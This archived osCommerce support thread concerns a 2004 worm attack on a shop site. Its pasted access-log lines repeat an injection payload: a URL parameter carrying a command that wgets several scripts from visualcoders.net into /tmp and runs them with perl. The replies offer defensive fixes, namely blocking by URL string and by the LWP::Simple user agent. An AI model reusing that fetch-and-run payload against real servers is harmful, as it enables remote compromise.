Jump to content

Archived

This topic is now archived and is closed to further replies.

PandA.nl

worm infection?

Recommended Posts

My host send me a message about a worm infection? They suspect the osCommerce script causes the problem :(

 

(By the way I don't have phpBB on the site)

 

They sent me this info about it:

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:41 +0100] "GET /conditions.php?osCsid=http://www

 

.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.vis

 

ualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;p

 

erl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27696 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /shopping_cart.php?osCsid=http://

 

www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.

 

visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.tx

 

t;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23367 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /redirect.php?action=manufacturer

 

&manufacturers_id=61&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%2

 

0www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net

 

/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:43 +0100] "GET /redirect.php?action=http://www.v

 

isualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visua

 

lcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;per

 

l%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:44 +0100] "GET /index.php?manufacturers_id=61&am

 

p;osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1

 

.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt

 

;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 33435 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /index.php?manufacturers_id=http:

 

//www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20ww

 

w.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.

 

txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19601 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /specials.php?osCsid=http://www.v

 

isualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visua

 

lcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;per

 

l%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28147 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:46 +0100] "GET /product_info.php?products_id=396

 

&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/wo

 

rm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.

 

txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23558 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /reviews.php?osCsid=http://www.vi

 

sualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visual

 

coders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl

 

%20ownz.txt;perl%20php.txt HTTP/1.1" 200 36272 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /product_reviews_write.php?produc

 

ts_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcode

 

rs.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%

 

20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:48 +0100] "GET /product_reviews_write.php?produc

 

ts_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.tx

 

t;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;pe

 

rl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /index.php?osCsid=http://www.visu

 

alcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualco

 

ders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%2

 

0ownz.txt;perl%20php.txt HTTP/1.1" 200 32331 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /product_info.php?cPath=77&pr

 

oducts_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visual

 

coders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;p

 

erl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19058 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:54 +0100] "GET /product_info.php?cPath=77&pr

 

oducts_id=290&language=en&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;w

 

get%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoder

 

s.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19077 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:08 +0100] "GET /product_info.php?products_id=291

 

&cPath=77&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visual

 

coders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;p

 

erl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 25476 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:22 +0100] "GET /index.php?cPath=69&osCsid=ht

 

tp://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%2

 

0www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20wor

 

m1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 46505 "-" "LWP::Simple/5.800"

 

panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:50 +0100] "GET /index.php?cPath=24&osCsid=ht

 

tp://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%2

 

0www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20wor

 

m1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27395 "-" "LWP::Simple/5.800"

 

Anybody knows what this means? And what I can do?

(I will contact the host too, but not today, since it's Christmas)


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

Would switching off perl help maybe? (see posted log)

 

I don't need perl for the site, as far as I know :huh:


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

We've had this website in our site too, "www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.vi" etc etc"

 

CHEMO, you say just eating bandwidth and nothing to worry about, have you heard of this before then?

 

Derek

Share this post


Link to post
Share on other sites

CHEMO

 

Just did a search on Google and found that.

 

Just added the following to the top of my index.php as suggested...

 

if (strpos($REQUEST_URI, 'visualcoders.net') > 0) {

exit;

};

 

Not sure if it will help though

 

Derek

Share this post


Link to post
Share on other sites

I would block the user agent but that is a personal choice...

 

I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent.

Share this post


Link to post
Share on other sites

Thanks for your tips!

 

I would block the user agent but that is a personal choice...

 

I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent.

stupid question probably, but could you tell me how to find out what the user agent is?

 

I also found this thread on the forums, it seems to be related

http://forums.oscommerce.com/index.php?sho...14entry511814

So I will try to block by user agent, and ask the host to upgrade PHP also.


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites
The user agent is  "LWP::Simple/5.800".

thanks steve, going to add that one right away! (allmost bedtime here, think I will sleep much better now :) )

 

Since I think I will need to know the user agent more often in the near future, could you tell me how I can find out myself next time?


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

Hi Derek,

 

it does not seem to help after all. It seems not to be visualcoders itself where the problem comes from (in my case), it's coming from lots and lots of different ip addresses from all over the world (so I guess the user agent will be different too).

 

I included this into my application_top.php and added a blocked_agents.txt file to the includes directory (just as how the spider sessions are supressed)

// banned user agents
define ('BLOCK_BY_USER_AGENT','True');
if (BLOCK_BY_USER_AGENT == 'True') {
   $user_agent = strtolower(getenv('HTTP_USER_AGENT'));
   // $block_user_agent = false;

   if (!(is_null($user_agent))) {
     $blocked_agents = file('includes/blocked_agents.txt');

     for ($i=0, $n=sizeof($blocked_agents); $i<$n; $i++) {
       if (!(is_null($blocked_agents[$i]))) {
         if (is_integer(strpos($user_agent, trim($blocked_agents[$i])))) {
           // $block_user_agent = true;
           exit('This user agent seems to be blocked!');
         }
       }
     }
   }
}

 

Or maybe the above script itself does function properly? Didn't have to test it properly yet.


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

:blush: I didn't think, I am using the code from the osC spider session script, but I didn't notice the "strtolower", and added the agent name using capitals. Now I added "lwp" (without the quotes) to the list. Don't know if it works yet , suddenly they all come and the next moment they're all gone again.


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

blocking only "lwp::simple/5.800" does not seem enough, but it looks like blocking all "lwp" does help.

 

Would it be wise to block all "lwp" user agents? Or am I blocking important search engines and/or lots of users too?


Please do not PM me for support, I will not respond anyway.

Share this post


Link to post
Share on other sites

×